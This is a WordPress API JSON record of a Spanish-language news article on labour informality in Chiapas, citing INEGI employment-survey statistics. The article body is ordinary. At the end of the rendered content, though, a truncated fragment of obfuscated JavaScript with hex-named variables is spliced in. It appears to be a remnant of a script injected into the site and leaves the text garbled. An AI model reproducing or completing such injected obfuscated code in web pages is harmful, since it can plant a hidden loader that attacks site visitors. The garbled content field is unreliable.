{"id":22205,"date":"2025-06-02T04:35:07","date_gmt":"2025-06-02T04:35:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22205"},"modified":"2025-06-02T04:35:08","modified_gmt":"2025-06-02T04:35:08","slug":"casi-dos-millones-de-chiapanecos-laboran-en-la-informalidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22205","title":{"rendered":"Casi dos millones de chiapanecos laboran en la informalidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"964\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000147884.jpg\" alt=\"\" class=\"wp-image-22206\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000147884.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000147884-224x300.jpg 224w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>1 de junio del 2025. Tuxtla Guti\u00e9rrez.- El estado de Chiapas enfrenta la crisis laboral m\u00e1s aguda del pa\u00eds, al tener uno de los niveles m\u00e1s altos de informalidad y el primer lugar condiciones laborales cr\u00edticas.<\/p>\n\n\n\n<p>Esto de acuerdo con la Encuesta Nacional de Ocupaci\u00f3n y Empleo (ENOE) del Instituto Nacional de Estad\u00edstica y Geograf\u00eda (INEGI).<\/p>\n\n\n\n<p>Los datos revelan que 76 % de los trabajadores chiapanecos laboran en la informalidad, solo superado por Guerrero (76.5 %) y Oaxaca (76.3 %), mientras que 49.8% sobrevive con salarios insuficientes o jornadas extenuantes, la tasa m\u00e1s alta a nivel nacional.<\/p>\n\n\n\n<p>La informalidad se encuentre en r\u00e9cord nacional, significa en datos duros, que 1.7 millones de chiapanecos trabajan sin seguridad social, acceso a salud o prestaciones.<\/p>\n\n\n\n<p>Casi la mitad (49.8 %) de los chiapanecos est\u00e1 con salarios cr\u00edticos y recibe menos de un salario m\u00ednimo, trabaja m\u00e1s de 48 horas semanales o combina ambas precariedades, una situaci\u00f3n que en la econom\u00eda se denomina \u201ccondiciones cr\u00edticas de ocupaci\u00f3n\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 1 de junio del 2025. Tuxtla Guti\u00e9rrez.- El estado de Chiapas enfrenta la crisis laboral m\u00e1s aguda del pa\u00eds, al tener uno de los niveles m\u00e1s altos de informalidad y el primer lugar condiciones laborales cr\u00edticas. Esto de acuerdo con la Encuesta Nacional de Ocupaci\u00f3n y Empleo (ENOE) del Instituto Nacional de Estad\u00edstica &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22206,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22205","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22205"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22205\/revisions"}],"predecessor-version":[{"id":22207,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22205\/revisions\/22207"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22206"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}